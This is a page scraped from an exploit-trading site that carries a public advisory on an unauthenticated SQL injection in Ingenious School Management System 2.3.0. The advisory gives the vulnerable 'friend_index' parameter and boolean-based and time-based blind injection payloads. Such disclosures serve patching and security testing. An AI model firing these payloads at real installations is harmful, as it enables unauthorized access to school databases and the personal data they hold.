0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ingenious School Management System 2.3.0 - friend_index SQL injection Vulnerability
# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection # Date: 01.11.2017 # Vendor Homepage: http://iloveprograming.com/ # Software Link: https://www.codester.com/items/4945/ingenious-school-management-system # Demo: http://iloveprograming.com/view/login.php # Version: 2.3.0 # Category: Webapps # Tested on: Kali Linux 2.0 # Exploit Author: Giulio Comi # Contact: https://<http://ihsan.net/>linkedin.com/in/giuliocomi #Description This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter. # Proof of Concept: http://localhost/view/friend_profile.php?friend_type=Student&friend_index=[SQL_injection_payload] # Vulnerable Parameter: friend_index (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg Vector: AND [INFERENCE] Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) # 0day.today [2024-12-23] #